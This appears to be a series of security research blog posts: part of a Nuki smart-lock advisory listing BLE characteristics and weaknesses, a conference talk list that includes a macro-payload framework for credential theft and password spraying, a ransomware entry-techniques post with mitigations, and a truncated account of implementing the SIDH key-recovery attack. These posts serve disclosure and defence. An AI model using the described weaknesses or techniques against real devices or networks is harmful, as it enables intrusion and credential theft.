READ, WRITE, INDICATE
0045 -> 005b
0049
004e
0053
0058
000000550000100080000026bb765291
0000004c0000100080000026bb765291
0000004e0000100080000026bb765291
0000004f0000100080000026bb765291
000000500000100080000026bb765291
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
005c -> 007b
0060
0066
006f
0078
000000450000100080000026bb765291
000000a50000100080000026bb765291
0000001d0000100080000026bb765291
0000001e0000100080000026bb765291
000000230000100080000026bb765291

READ, WRITE
READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE
007c -> 0088
0080
0085
000000440000100080000026bb765291
000000190000100080000026bb765291
000000370000100080000026bb765291

READ, WRITE
READ, WRITE
0089 -> 008c
008b
a92ee100550111e4916c0800200c9a66
a92ee101550111e4916c0800200c9a66

READ, WRITE, INDICATE
008d -> 0095
008f
0092
0095
a92ee200550111e4916c0800200c9a66
a92ee201550111e4916c0800200c9a66
a92ee202550111e4916c0800200c9a66
a92ee203550111e4916c0800200c9a66

READ, WRITE, INDICATE
READ, WRITE, INDICATE
WRITE
009d -> ffff
00a1
00a7
00ad
000000960000100080000026bb765291
000000680000100080000026bb765291
0000008f0000100080000026bb765291
000000790000100080000026bb765291

READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE, INDICATE

Keyturner v3 characteristics with write properties:

Handles Service > Characteristics Properties
0008 -> 000b
000a
a92ee100550111e4916c0800200c9a66
a92ee101550111e4916c0800200c9a66

READ, WRITE, INDICATE
000c -> 0014
000e
0011
0014
a92ee200550111e4916c0800200c9a66
a92ee201550111e4916c0800200c9a66
a92ee202550111e4916c0800200c9a66
a92ee203550111e4916c0800200c9a66

READ, WRITE, INDICATE
READ, WRITE, INDICATE
WRITE
001a -> 002b
0022
0027
000000a20000100080000026bb765291
000000370000100080000026bb765291
000000a50000100080000026bb765291

READ, WRITE
READ, WRITE
002c -> 005f
0030
0035
003a
003f
0044
0049
004e
0053
005c
0000003e0000100080000026bb765291
000000140000100080000026bb765291
000000200000100080000026bb765291
000000210000100080000026bb765291
000000230000100080000026bb765291
000000300000100080000026bb765291
000000520000100080000026bb765291
000000530000100080000026bb765291
000000a60000100080000026bb765291
000002200000100080000026bb765291

READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE, INDICATE
READ, WRITE
0060 -> 0076
0064
0069
006e
0073
000000550000100080000026bb765291
0000004c0000100080000026bb765291
0000004e0000100080000026bb765291
0000004f0000100080000026bb765291
000000500000100080000026bb765291

READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
0077 -> 0096
007b
0081
008a
0093
000000450000100080000026bb765291
000000a50000100080000026bb765291
0000001d0000100080000026bb765291
0000001e0000100080000026bb765291
000000230000100080000026bb765291

READ, WRITE
READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE
0097 -> 00a3
009b
00a0
000000440000100080000026bb765291
000000190000100080000026bb765291
000000370000100080000026bb765291

READ, WRITE
READ, WRITE
00a4 -> ffff
00a8
00ae
00b4
000000960000100080000026bb765291
000000680000100080000026bb765291
0000008f0000100080000026bb765291
000000790000100080000026bb765291

READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE, INDICATE

Recommendation

It is recommended to investigate the issue and try to identify the root cause.

Additionally, all BLE services and characteristics implemented by the Keyturner should be reviewed, disabling those which are not required for business purposes.

Insecure Invite Keys Implementation

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock application (v2022.5.1 (661))

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: N/A

Risk: 1.9 (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)

Summary

Invite token, which was created to identify the user during the invitation process, was also used to encrypt and decrypt the invite keys on the Nuki servers.

Impact

If malicious actor can take control of Nuki servers, this insecure implementation could facilitate the leak of this sensitive information and the invite user impersonation.

Details

Based on conversations with Nuki, the invite functionality, which allows inviting users to interact with the Keyturner either temporarily or permanently, used the invite token to encrypt and decrypt the invite keys on server-side (Nuki Servers), which would reduce the effectiveness of the encryption implementation.

Encryption and decryption of sensitive information (such us invite keys) should be implemented on the client-side (administrator and invite user) and the encryption keys never known by Nuki.

Recommendation

Based on conversations with the Nuki team, it is known that the invite functionality was designed to work when the temporary user is not close the hardware device, that means, some external resources (Nuki Server e.g.) would be required.

Nevertheless, it is highly recommended implementing a strong encryption to avoid sensitive data (such as invite keys) being stored or sent out of the secure and trusted client environment.

A most secure implementation can be implemented by using a pre-shared key shared between the Keyturner administration and the invite user (as the invitation token is exchanged) in order to encrypt all invitation data (including the invitation key) before sending it to the Nuki servers. This would ensure that only the invite user could decrypt the sensitive information stored on the Nuki servers.

Opener Name Could Be Overwritten Without Authentication

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Opener (<1.8.1)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: N/A

Risk: 2.1 (CVSS:2.0/AV:L/AC:L/Au:N/C:N/I:P/A:N)

Summary

Opener Bluetooth Low Energy (BLE) characteristics were implemented insecurely.

Impact

The device allowed an unauthenticated attacker to change the BLE device name.

Details

The following were some of the services and characteristics available through the BLE protocol:

BLE write characteristic enabled

As seen in the image above, the “Device Name” characteristic had write access enabled. As a result, it was possible to send a write command to the device and change its name.

Recommendation

Require authentication for write operations on the device.

Vendor Communication

April 20 2022: Nuki was informed about the vulnerabilities found during the research.
May 6 2022: Nuki provided information to NCC Group about the fixes progress and potential release dates.
June 9 2022: Nuki released the vulnerability patches for all of our submitted vulnerabilities and informed to their clients.
June 19 2022: Nuki provided updates about the patching progress of their clients.
July 25 2022: Technical advisories were released

Thanks to

The Nuki team for their work during the whole process of responsible vulnerability disclosure. They have worked closely with NCC Group in order to provide security fixes for all the vulnerabilities found during the research to their customers. Therefore, we would like to praise their professionalism, responsiveness and the commitment to the security of their product.

Matt Lewis (Commercial Research Director at NCC Group) for his help and support during the disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  July 25 2022

Written by:  Daniel Romero, Pablo Lorenzo and Guillermo del Valle Gil


NCC Group Research at Black Hat USA 2022 and DEF CON 30

3 August 2022 at 20:15

This year, NCC Group researchers will be presenting at least five presentations at Black Hat USA and DEF CON 30.

A guide to these presentations (abstracts, dates, and links) is included below. We will also update this post with any additional presentations as they are accepted and announced.

Virtually or in-person, we hope you will join us!

Black Hat USA 2022

  • RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise (Iain Smart & Viktor Gazdag, NCC Group)
  • MacAttack – A client/server framework with macro payloads for domain recon and initial access (Chris Nevin, NCC Group)
  • Responding to Microsoft 365 security reviews faster with Monkey365 (Juan Garrido, NCC Group)

DEF CON 30

  • Pursuing Phone Privacy Protection (Matt Nash, NCC Group & Mauricio Tavares, Privacy Test Driver)
  • Hidden Payloads in Cyber Security (Chantel Sims, NCC Group)

Black Hat USA 2022

RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise

Iain Smart & Viktor Gazdag, NCC Group

Black Hat USA 2022 – Briefings

August 10-11 2022

In the past 5 years, we’ve demonstrated countless supply chain attacks in production CI/CD pipelines for virtually every company we’ve tested, with several dozen successful compromises of targets ranging from small businesses to Fortune 500 companies across almost every market and industry.

In this presentation, we’ll explain why CI/CD pipelines are the most dangerous potential attack surface of your software supply chain. To do this, we’ll discuss the sorts of technologies we frequently encounter, how they’re used, and why they are the most highly privileged and valuable targets in your company’s entire infrastructure. We’ll then discuss specific examples (with demos!) of novel abuses of intended functionality in automated pipelines which allow us to turn the build pipelines from a simple developer utility into Remote Code Execution-as-a-Service.

Is code-signing leading your team into a false sense of security while you programmatically build someone else’s malware? Is it true that “any sufficiently advanced attacker is indistinguishable from one of your developers”? Have we critically compromised nearly every CI/CD pipeline we’ve ever touched? The answer to all of these questions is yes.

Fortunately, this presentation will not only teach you exactly how we did it and the common weaknesses we see in these environments, but also share key defensive takeaways that you can immediately apply to your own development environments.


MacAttack – A client/server framework with macro payloads for domain recon and initial access

Chris Nevin, NCC Group

Black Hat USA 2022 – Arsenal

August 10-11 2022

While using macros for malicious purposes is nothing new, this tool provides a suite of payloads ideal for initial recon and footholds that will not burn other methods of attack. MacAttack is a framework that generates payloads for use in Excel and includes client/server communication to perform dynamic alterations at runtime and collate received data. The payloads included in MacAttack cover a number of areas that have not been published before, including a new stealth technique for hiding payloads, methods for retrieving a user’s hash, and performing common recon/early stages attacks such as As-Rep roasting, retrieving documents, browser credentials, password spraying the domain, enumerating users, and domain fronting. The client/server communication and GUI will allow for dynamic checks such as only allowing a password spray to run once or once within a certain time period even if multiple targets enable the payload at the same time, and will provide a visual representation of the enumerated information. Part of the benefit of this tool is that this information is retrievable from a “zero foothold” position – a phishing campaign may be detected or blocked – but this does not burn any existing beacons and the potential rewards can be as great as multiple sets of credentials for users and relevant authentication portals. Microsoft are rolling out changes to macros that have still not been fully deployed by the time of the deadline – and research into these changes and impacts will be included in the discussion. It looks like these changes will only affect O365 to begin with and will include a “recommended policy” to implement.


Responding to Microsoft 365 security reviews faster with Monkey365

Juan Garrido, NCC Group

Black Hat USA 2022 – Arsenal

August 10-11 2022

Monkey365 is a multi-threaded plugin-based PowerShell module to help assess the security posture of not only Microsoft 365, but also Azure subscriptions and Azure Active Directory. It contains multiple controls and currently supports CIS, HIPAA, GDPR, as well as custom security rules.


DEF CON 30

Pursuing Phone Privacy Protection

Matt Nash (NCC Group) & Mauricio Tavares (Privacy Test Driver)

DEF CON 30 – Crypto & Privacy Village

August 11-14 2022

New year, new challenges to privacy.

You are in a public event, or a coffee shop. Did a notification just tell you about a sale nearby? Why is this app showing ads for the car you rented and told your friend about? Is Santa Claus the only one who knows if you’ve been naughty or nice? “Maybe if I run a VPN I will be safe.” This is wishful thinking at best; it only helps to deal with some privacy attacks. You see, smart phones are little snitches. By design.

They listen to you. They know where you go, what you purchase, and who you interact with. And they never sleep or take vacations.

You can fight back. You can regain (at least some) control of your privacy! But it will not be done buying some magic software and pressing the EZ button. Some assembly is required.

If you are willing to roll up your sleeves and take your brave pill, join us in this workshop as we show how to build your Android phone with the balance between privacy, security, and convenience that fits your comfort level.

Attendees will come out of this workshop with a privacy mindset:

  • Appreciating the privacy and security implications of using a smart phone in general — specifically consumer Android devices.
  • Knowing how to achieve different levels of privacy in their phones and understanding the costs and benefits of each approach.
  • Understanding what “attribution of traffic” tying IP to a person through a VPN is.Finding out which apps are privacy-respecting, and how to contain untrusted apps that may be a “must have”.

Who should take this workshop:

  • Privacy-conscious smartphone users who would like to understand and control what their phones share about them.

Audience Skill Level:

  • Intermediate
  • Entry level, if you have studied the instructions and are prepared to hit the ground running. Or if your team is willing to help you out. We will NOT be able to wait for you to install 374 OS updates, download and install VirtualBox, and then build a Linux VM.

Attendees’ requirements

  • An understanding of basic Linux commands.
  • Be comfortable with the idea of installing an aftermarket firmware/OS (“ROM”) on a mobile device. Soft/hard “bricking” is a possibility, so having a spare phone may be a good investment.
  • Follow additional instructions provided on the GitHub repository (https://github.com/matthewnash/building-phone-privacy/wiki) ahead of the workshop.

What students should bring (or do beforehand)

  • An Android phone that has been configured per the GitHub instructions.
  • Alternatively, a laptop with Android Studio installed.
  • A learning attitude.


Hidden Payloads in Cyber Security

Chantel Sims, NCC Group

Black Hat USA 2022 – Girls Hack Village

August 10-11 2022

“Hidden Payloads in Cyber Security”

Cybersecurity has a diversity problem. We all know this. Executives and managers believe that filling job roles and enacting diversity initiatives is where the work begins and ends. Even though we are aware of this diversity problem, we’ve only just begun to start the conversation of how “bias” directly impacts hiring practices and cyber operations themselves. Our lack of observation of our bias’ has also made most of us blind to the bias that exist within our security tools and operations. To be fair, social engineering is the one, if not only, place where we bend and manipulate bias to our will. But I believe we should do the same within our operation’s as a whole. In 2018, Joy Buolamwini’s began to research and call out algorithmic bias and its impacts. Through Joy and Timnit Gebru’s research, the tech community has finally started to acknowledge the real world implications of biased algorithms. As humans, we tend to “believe what we think”. It’s not common practice for most humans to question or challenge their thought bubbles. Most humans are aware that a thought doesn’t necessarily equate to being factual in reality but
the action of diving deeper seems to be staved off by our ego’s and credulous brains. I’d argue that our ‘inaction’ to dive deeper into our own personal bias’ is a precursor to writing biased code or tools and affects cyber operations in general which therefore contributes to a continuing cycle of cyber operations embedded with bias.

Top of the Pops: Three common ransomware entry techniques

by Michael Mathews

Ransomware has been a concern for everyone over the past several years because of its impact to organisations with the added pressure of extortion and regulatory involvement. However, the question always arises as to how we prevent it. Prevention is better than cure and hindsight is a virtue. This blog post aims to cover some high-level topics around ransomware groups, affiliates and their initial entry tactics.

Something to consider is the fact that ransomware has moved quickly into a Ransomware as a Service (RaaS) model, whereby affiliates are being provided all the weaponry and playbooks required to carry out their objectives. Given the simplicity of this approach, and the fact that the tactics are repeatable, there are a number of preventative measures that can be taken. Using this, we have devised this blog post to provide a short list of the top initial entry methods observed from the front line whilst responding to incidents over the past 6 months.

ProxyShell

ProxyShell is the collective name used to describe the vulnerabilities, released between April and July 2021, affecting Microsoft Exchange. This vulnerability has been covered in detail elsewhere [1], therefore for conciseness, they can be summarised as:

  • ACL Bypass (CVE-2021-34473)
  • Privilege Escalation (CVE-2021-34523)
  • Remote Code Execution (CVE-2021-31207)

Due to the Exchange infrastructure being externally facing, affiliates cast their nets far and wide scanning for victims that have failed to patch and thus begin their attacks by using ProxyShell as their initial foothold.

Mitigations

  • KB5001779
  • KB5003435

Patching! Patches were released in May 2021 by Microsoft to mitigate the vulnerabilities in the form of Windows update codes:

Microsoft Exchange Online or Office365, as more commonly referred to, was not affected. SaaS is a well placed alternative and provides a barrier to your on-premises network (with appropriate security controls).

Externally Facing Infrastructure

Whilst we could classify Exchange under this term, it deserved its own spot given it is a firm favourite with ransomware groups (partly due to its success rate). In this category, we will cover another favourite, specifically referring to firewalls.

FireWalls and other perimeter security solutions have grown ever more complex and offer a wide variety of services outside of allowing and denying network traffic on the perimeter, most notably VPN’s.

A prime example of this is a vulnerability that was exploited in FortiGate devices, CVE-2018-13379. The vulnerability itself was directory traversal but, it did provide access to sensitive files which contained plaintext passwords. In turn, you have your recipe for disaster and a ransomware actors initial entry point. The username and password could be used to authenticate with the VPN and gives  threat actors a foothold on the internal network. However, this is just one example, on several occasions we have observed firewalls being targeting and successfully leveraged as an entry point into the network.

Mitigations

Once again patching, edge network devices are extremely vulnerable given their position within the network, the precise device you are using to keep threat actors at bay may in fact be the target in the first place. Ensure you have a robust patching policy, and your devices are updated frequently.

Second, multi factor authentication (MFA) is critical to mitigate standard username/password-based attacks. Although a vulnerability is exploited to gain access to credentials in this instance, phishing would have had the same impact if VPN credentials were targeted.

Exposed Remote Desktop (other VDI solutions)

An old favourite, the GUI interface of RDP. Whilst a great way to connect to a remote device, it does not really have a place on the internet. If you are seeing your failed login count hit numbers you cannot easily say, there may be an underlying problem that could be a host exposing RDP to the internet.

When paired with weak security controls, weak credentials (domain or local), no lockout policy, you are effectively providing a free shot to affiliates to take a gamble and gain access to your network. This is most prominent with development environments, setup with default settings, a weak local password and publicly available for ease of use. This is especially prevalent in cloud environments where build images inherit several security flaws through poor configuration but allow users to stand up infrastructure quickly.

Mitigations

Use a enterprise VPN solution with MFA configured to access internal resources from remote locations.

Treat development environments with care and ensure build images have appropriate security controls and protective monitoring in place.

Proactive Measures

Taking a proactive stance to ensure the integrity of your network is critical, it is never too late to begin to harden your defences or at least verify you are secured. However, if you need support or help to assess the scale of the issue, we can help:

  • Unsure if you are affected by any of these vulnerabilities or misconfigurations?
  • You have identified a host that is vulnerable is requires further investigation?
  • Concerned about what is lurking in the wider network?

If you have been impacted by any of these issues, or currently have an incident and would like support, please contact our Cyber Incident Response Team at +44 161 209 5148 / [email protected]

[1] https://www.ncsc.gov.ie/pdfs/MS_Proxyshell_060921.pdf`

Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath

8 August 2022 at 21:44

Introduction

Last weekend (July 30th) a truly incredible piece of mathematical/cryptanalysis research was put onto eprint. Wouter Castryck and Thomas Decru of KU Leuven published a paper “An efficient key recovery attack on SIDH (preliminary version)” describing a new attack on the Supersingular Isogeny Diffie-Hellman (SIDH) protocol together with a corresponding proof-of-concept implementation.

SIDH is at the core of the Post-Quantum key encapsulation mechanism SIKE, which was expected to continue to round four of the NIST Post-Quantum Project for consideration of standardisation. The paper says that their proof of concept code can break the proposed NIST level 1 parameters (supposedly approximating security on-par with AES-128) in an hour of single core computation, and the strongest parameter set in less than 24 hours.

However, the proof of concept code published has been written using the computer algebra software system Magma. Magma is a very efficient and powerful piece of software, but it is difficult for people to obtain access to. This meant that despite being able to run the attack over a lunch break, most of the community was unable to verify the result at all.

Motivated by a beautiful attack and a love of open-source software, a plan was made to read the attack and implementation and then reimplement it in SageMath; a free, open-source mathematics software system. This was not only a great opportunity to learn exactly how the attack came together, but the effort should also then open up the research to the cryptographic community, who could verify the attack themselves. There’s nothing more convincing than seeing the secret key appear before your very eyes!

This blog post is about the attack, but it’s mainly a story about how the code was reimplemented and the help which was received from collaborators along the way. It’s been a wild week and there’s a lot to learn in more detail, but for those eager to break some isogeny based crypto protocols, the implementation is now available on a public GitHub repository. Thanks to some additional performance enhancements that we’ll talk about along the way, you can break the SIKE NIST level 1 parameter set with your laptop, a fresh download of SageMath and only 10 minutes of your time.

Approximate Running Time $IKEp217 SIKEp434 SIKEp503 SIKEp610 SIKEp751
Paper Implementation (Magma) 6 minutes 62 minutes 2h19m 8h15m 20h37m
Our implementation (SageMath) 2 minutes 10 minutes 15 minutes 25 minutes 1-2 hours
Comparison between running times of the original proof of concept released with Wouter Castryck and Thomas Decru‘s paper, and the current version of our SageMath implementation. Our implementation is available in a public repository: https://github.com/jack4818/Castryck-Decru-SageMath

Table of Contents

The search for quantum-safe cryptography

To understand the importance of the attack, it helps to put it in context. In 2016, NIST announced the Post-Quantum Cryptography Project. The aim was to call on cryptographers to submit algorithms split between two categories: key encapsulation mechanisms (KEMs) and digital signatures. The motivation is that the asymmetric cryptography currently in place — Diffie-Hellman key exchanges using elliptic curves for a KEM and ECDSA/EdDSA for digital signatures — can be efficiently broken by an attacker with access to a sophisticated quantum computer using Shor’s algorithm.

Although the construction of such a quantum computer has not been achieved, history tells us that the uptake of new algorithms is slow (we still see 3DES and MD5 in the wild, for example). So NIST believe the best plan is to act preemptively and to start working on getting new, quantum-safe algorithms out there as soon as possible.

Constructing new cryptographic algorithms is complicated. Furthermore, for asymmetric algorithms, we rely on the existence of some trapdoor function which is easy to perform one way and hard to undo the other. Typically, mathematics is used to create these functions (multiplication/factoring for RSA or exponentiation/discrete logarithms for elliptic curves). These mathematical trapdoors always come with some associated structure. The hope is that we understand the structure enough that we can confidently assume certain problems are hard to solve. In a quantum setting, it is the Abelian group structure of the ring of integers modulo N and the group of points on an elliptic curve which results in the break of RSA and ECC.

The balancing act of structure and cryptographically hard problems is at the heart of why projects such as the NIST PQCrypto Project take so long, with multiple rounds and iterative algorithm design. Cryptographic protocols can be designed and studied for years only to break after one very clever idea. This happened recently when Ward Beullens published Breaking Rainbow Takes a Weekend on a Laptop in June 2022, effectively knocking Rainbow out of the PQC project.

Last month, NIST recently announced the end of round three of the project and with it, their first selection of algorithms to be standardised for cryptographic applications:

  • CRYSTALS-Kyber (KEM).
  • CRYSTALS-Dilithium, Falcon, and SPHINCS+ (Digital signatures).

To ensure diversity of trapdoor functions, NIST are starting round four. The hope is to find new KEM algorithms which have different hardness assumptions to Kyber, increasing the chances of having a long-lasting, quantum-safe KEM. A recent blog post by Thomas Pornin discusses in more detail the round three selections and a history of the NIST PQC project.

SIKE: Supersingular Isogeny Key Exchange

One of the candidates selected for round four is SIKE (Supersingular Isogeny Key Encapsulation), an isogeny based KEM which uses SIDH to perform the key exchange. This blog post won’t be a precise discussion of isogeny based cryptography, but for those who are interested here are some links to click through for a great first introduction:

To give some intuition though, we give an inaccurate but morally correct overview of what’s happening by first making a stop past something more familiar.

In an elliptic curve key exchange, a shared secret is found in the following way. Alice and Bob both start with a fixed point and using a secret number they “move” from this point to their new points A and B, which are made public. They send these to each other and then Alice (Bob) moves from B (A) as they did before, using the same secret number on the new point. By doing this, they end up at the same “place”, a point S, and this is used to derive a key for the rest of their communication.

In SIDH a very similar thing happens. Alice and Bob both start from the same place, but now instead of the start being a point on a curve, it is an elliptic curve itself. For reasons that aren’t necessary when so many other details are missing, not any old curve will do here. A special type of curve is used, which mathematicians know as a supersingular elliptic curve.

Alice and Bob then “move” from a public starting curve to some new curve, which will be part of the public data. This “movement” between curves is performed by creating a secret isogeny, which is a clever map which takes Alice from one curve to some other supersingular curve (while also preserving the group structure of the curve). The isogeny can be generated efficiently because of the clever parameters SIDH uses and for this post, it’s enough to know that Alice creates her secret isogeny by generating a secret integer. This is mixed into some fixed elliptic curve points which are defined by the SIKE parameters. This resulting secret point is what is used to generate the secret isogeny. The takeaway is: if an attacker can recover this secret integer, the whole protocol is broken.

To perform a key exchange, Alice and Bob both generate random numbers and use these to create secret isogenies. They use these to move to some new curves E_A and E_{B} and they share these curves with each other. The Isogeny path problem is that given two elliptic curves, it is generally very hard to determine the isogeny which links them. If you want a visual picture, the isogenies linking supersingular curves make a very messy graph and it’s easy to get lost. This is similar in feeling to how given two points in an elliptic curve key exchange, the discrete log problem is that it’s assumed to be hard to recover the integer which relates them.

In SIDH things aren’t quite as simple as the elliptic curve example. Given each other’s public curves, if Alice and Bob both naively use their isogenies again to try and move to the same place, they do not end up on a shared curve. All is not lost though, SIDH fixes this by including additional information in the exchange. Not only does Alice (Bob) send Bob (Alice) their public curve, they also use their isogeny and use it to map a pair of public points from the starting curve to their new curve. These extra points are known as the torsion, or auxiliary points. Sending a package of the mapped curve with the pair of mapped points is enough to ensure Alice and Bob end up on a shared secret curve (technically, up to isomorphism, but if this doesn’t make sense, forget you read it) and this can be used to derive keys.

SIKE builds on the SIDH protocol with fixed parameters and key encapsulation. But for our purposes for this attack, breaking SIDH also breaks all parameter sets of SIKE.

Since SIDH has been proposed, the inclusion of additional information by sending the image of the torsion points has worried researchers. The concern was that the isogeny path finding problem could remain hard while the potentially easier problem, known as the Supersingular Decision Diffie-Hellman problem, could be broken through some information leaked out by how the secret isogeny acts on these auxillary points.

This is the problem which Wouter Castryck and Thomas Decru have shown is easy! It turns out, the structure which is currently used in SIDH to make a sensible key-exchange mechanism leaked too much information about secret values. Through some genius mathematics and a deep understanding of the protocol, the Castryck-Decru attack recovers Bob’s secret isogeny in polynomial time.

This blog post is a celebration of this attack, and to talk about it, we talk about its implementation. The proof-of-concept code that Castryck and Decru shared with their paper was written to run in a special computer algebra software package called Magma. So, what’s Magma?

Computer algebra software

Cryptographic attacks which rely on advanced mathematics are often written using specialised mathematical software. For cases when the code needs to be hyper-optimised, the code is then usually translated to a more performant language after a proof of concept is developed. However, more often than not, these pieces of software are advanced enough to do what the researchers need. Let’s review two of the most commonly used software systems.

  • Magma is a computer algebra software package maintained by the University of Sydney. It is known for having expansive coverage, with efficient implementations of computational algorithms from algebra, number theory and algebraic geometry. It is also closed source, expensive and only available to people associated with institutions who maintain licence distribution.
  • SageMath is a free, open-source mathematics software system licensed under the GPL. Its mission is to “Create a viable free open source alternative to Magma, Maple, Mathematica and Matlab.” SageMath is built on top of Python, but many algorithms come from other open-source packages and are accessed through wrappers and interfaces, allowing high performance computation.

Because of the barriers to getting hold of Magma, many people active in the cryptographic research community don’t have access. However, if you are interested and want to run snippets of code, the Magma calculator allows cloud based computations (albeit with a two-minute run time limit).

In contrast, everyone with a computer has access to SageMath. Personally, I have used it extensively to learn about cryptography, build and deliver cryptography challenges for CryptoHack, and even occasionally to implement maths papers for fun! It’s an incredible piece of software.

Overview of the attack

Another disclaimer before starting this section, this blog post does not aim to give a comprehensive discussion of how Castryck and Decru have broken SIDH. The mathematics is very advanced, and requires a deep understanding of how SIDH works, as well as the more esoteric research of Abelian surfaces and Richelot isogenies.

The hope is only to give enough context that the rest of the post is motivated and enjoyable to read. So before starting, here are some great resources from the community discussing the result which the interested reader can browse through:

Attacking the structure of SIDH

Note: if you’re happy just accepting there’s a clever mathematics which makes this attack work, you can skip the next two sections!

To allow the attack to be successful, the attack uses several properties of the SIDH protocol and SIKE parameters. Whether all of these conditions are necessary for the attack to work are part of ongoing research, but to set the scene, let’s look at what is used.

The public key contains the image of the torsion points

  • This is totally vital for the attack. They are also totally vital for SIDH to be a sensible key exchange protocol, so in its current form, SIDH cannot avoid this part of the attack.
  • Knowing how the secret isogeny acts on the torsion points has been worrying for a long time. In Improved torsion-point attacks on SIDH variants, the authors of the paper heavily reduced the parameter space for SIDH, but the attack did not extend to the SIKE parameters.
  • In section 8.1 of the paper, arbitrary torsion points are discussed. It is thought that changing the form of the prime (and hence changing the torsion points) should inherently change nothing about the attack.

The secret isogenies have a fixed degree

  • Alice computes an isogeny of degree 2^a and Bob computes an isogeny of degree 3^b. This is the core of how the algorithm works, but it is also core to how the attack works.

The above two properties are the most important and are also special to SIDH. For this reason, people believe the attack cannot be generalised to other isogeny based schemes such as CSIDH or SQISign, which do not have isogenies of a fixed degree or additional torsion points.

The starting curve has a known endomorphism ring

  • Generating supersingular curves randomly is hard. Of the p^2 possible elliptic curves, only (about) \lfloor p/12 \rfloor are supersingular. For cryptographically large p, finding a supersingular curve by guessing is not reasonable.
  • Luckily, we have a way to write down a special supersingular curve for a given prime (which comes from the theory of complex multiplication). However, this method also gives us more structure: we learn the endomorphism ring of the curve.
  • One could use one of these curves, then generate an isogeny to walk to some random curve. However, knowing the starting curve and the isogeny used to get the new curve also leaks the endomorpishm ring of the new curve.
  • In sections 8.2 and 8.3, Castryck and Decru outline that the attack should weaken the security of SIKE parameters, even when the endomorphism ring of the starting curve unknown.

The Glue-and-Split oracle

From a high level, Castryck and Decru’s attack recovers the secret integer (in base 3) which is used to generate the secret isogeny; it does not directly compute the secret isogeny itself. The algorithm works by taking a step along the unknown path and asking the oracle if the step was correct. Depending on the return value, a new step can be guessed, or it can continue down the path to discover the next secret digit.

Walking down Bob’s secret path, there are only one of three directions to take after each step. This means for each step that is taken, at most two calls to the oracle are needed. This is what makes the attack so efficient. Every step (except for the first few, depending on the parameter choices) can be validated one by one and the secret integer is recovered digit-by-digit.

The genius of the attack was finding a method to validate whether the step taken is on the right path. As the constructed oracle only requires public data, the SIDH protocol as currently implemented is totally broken. Due to the efficiency of the attack, the common defense of increasing the bit-size of the parameter space is not suitable.

The oracle begins with the collected public data. A cleverly constructed isogeny allows the creation of a new curve C from the starting curve E_{start}. Very loosely, the oracle takes these two curves and makes a new object from their product, which can be seen as a higher-dimension abelian surface. The Glue-and-Split oracle then takes pairs of points from E_{start}: (P,Q) and C: (P_C, Q_C) and represents them as points on this higher-dimensional object (P_C, P) and (Q_C,Q) (these are points on the Jacobian of a hyperelliptic curve).

This hyperelliptic curve and pair of new points are mapped through a chain of isogenies (known as Richelot isogenies). At the end of this chain, if the hyperelliptic curve can be decomposed back into a product of elliptic curves, then the correct digit must have been guessed. The reason this all works is because of a theorem by Kani (1997) and the ability to construct the auxiliary isogeny from E to C (which in the current implementation abuses the known endomorpishm ring of the curve).

Implementing the attack

The following discussion is a fairly informal write-up of the 24-hour period starting from an empty repository and ending with a efficient implementation of the attack. The hope is that this not only helps to give a good review of the pieces that come together for the attack to work, but also gives an impression of the problems which arise when implementing mathematical algorithms (and other issues introduced by rushing fingers a little too excited to type precisely).

Learning Magma: or how I came to love syntax bugs

The first step of converting Magma to SageMath was understanding how to translate the syntax. Some changes, like variable declaration with a := 1; rather than a = 1 were simple to fix up.

Additionally, many of the higher-level mathematical objects such as EllipticCurve() orPolynomialRing() had almost identical representations. For anything I didn’t recognise, it was usually enough to find the function in the Magma Documentation, read the expected behaviour and find the relevant function in the SageMath Documentation. In some cases Magma had support for structures which SageMath didn’t perfectly mirror.

One example of this was that Magma can work with multivariate function fields:

// magma
Uff<u0, u1, v0, v1> := FunctionField(Fp2, 4);

However, when trying to define this in SageMath, it was found that only univariate function fields could be constructed directly. The workaround for this was found in the community support forum where it was explained that you could create a suitable object by first defining a multivariate polynomial ring and then creating the fraction field from it:

# SageMath
Uff_poly.<u0, u1, v0, v1> = PolynomialRing(Fp2, 4)
Uff = Uff_poly.fraction_field()

Mathematics aside, the difference which caused the most bugs during conversion was very simple. Magma accesses elements in arrays using 1-index, and when looping through a range, it is inclusive of the upper bound. In contrast, SageMath is 0-indexed and does not include the upper bound. In this sense, Magma behaves in the “old-style” similar to Fortran or Pascal, where as (via Python) SageMath follows the 0-index convention started with C (or rather its predecessor B).

As an example: printing out integers from an array in both languages would be achieved as:

// Magma 
my_array := [2,3,5,7,11];

for i in [1..5] do
 print my_array[i];
end for;
// output: 2,3,5,7,11
# SageMath
my_array = [2,3,5,7,11]

for i in range(0,5):
   print(my_array[i])
# output: 2,3,5,7,11

This meant that careless copy-pasting and tidying could easily introduce off-by-one errors throughout the code. This is exactly what happened and correcting these syntax typos was being done all the way up to the code working!

Getting organised

The first goal was to reimplement the SIKE_challenge.m file, which was an implementation of the attack which was said to have solved Microsoft’s $IKEp217 challenge (this was announced last year, with a cash bounty of $50,000 for the first team to crack it). The prime used has only half the bits of the NIST level 1 parameters (SIKEp434) and supposedly ran in approximately 5 minutes using the Magma script (too long for the free Magma calculator, sadly…). As such, it was the perfect place to start.

